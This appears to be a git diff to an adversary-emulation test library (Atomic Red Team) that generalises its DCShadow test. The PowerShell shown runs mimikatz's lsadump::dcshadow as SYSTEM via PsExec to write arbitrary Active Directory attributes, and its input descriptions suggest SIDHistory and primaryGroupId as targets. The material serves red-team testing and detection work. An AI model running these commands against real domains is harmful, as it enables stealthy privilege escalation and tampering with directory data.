diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 044e72a5..8f7cce9c 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -38149,11 +38149,20 @@ defense-evasion: supported_platforms: - windows input_arguments: - user: - description: Targeted user (for machine account do not forget to add final + object: + description: Targeted object (for machine account do not forget to add final '$') type: string - default: CLIENT1$ + default: bruce.wayne + attribute: + description: 'Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, + SIDHistory...' + type: string + default: badpwdcount + value: + description: Value to assign to object attribute + type: string + default: 9999 mimikatz_path: description: Mimikatz windows executable type: path @@ -38196,7 +38205,7 @@ defense-evasion: # starting fake DC server, as SYSTEM (required) $dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log" Remove-Item $dc_output_file -ErrorAction Ignore - $mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`"" + $mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`"" $dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam" # wait for fake DC server to be ready... @@ -38210,6 +38219,7 @@ defense-evasion: Write-Host "`nOutput from fake DC server:" Get-Content $dc_output_file + Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it Remove-Item $dc_output_file -ErrorAction Ignore Write-Host "End of DCShadow" diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md index 83588369..8d3ae33f 100644 --- a/atomics/T1207/T1207.md +++ b/atomics/T1207/T1207.md @@ -33,7 +33,9 @@ The easiest is to run elevated and as a Domain Admin user. #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| user | Targeted user (for machine account do not forget to add final '$') | string | CLIENT1$| +| object | Targeted object (for machine account do not forget to add final '$') | string | bruce.wayne| +| attribute | Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, SIDHistory... | string | badpwdcount| +| value | Value to assign to object attribute | string | 9999| | mimikatz_path | Mimikatz windows executable | path | $env:TEMP\mimikatz\x64\mimikatz.exe| | psexec_path | Path to PsExec | string | C:\PSTools\PsExec.exe| @@ -45,7 +47,7 @@ The easiest is to run elevated and as a Domain Admin user. # starting fake DC server, as SYSTEM (required) $dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log" Remove-Item $dc_output_file -ErrorAction Ignore -$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`"" +$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`"" $dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam" # wait for fake DC server to be ready... @@ -59,6 +61,7 @@ Wait-Process $dc Write-Host "`nOutput from fake DC server:" Get-Content $dc_output_file +Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it Remove-Item $dc_output_file -ErrorAction Ignore Write-Host "End of DCShadow"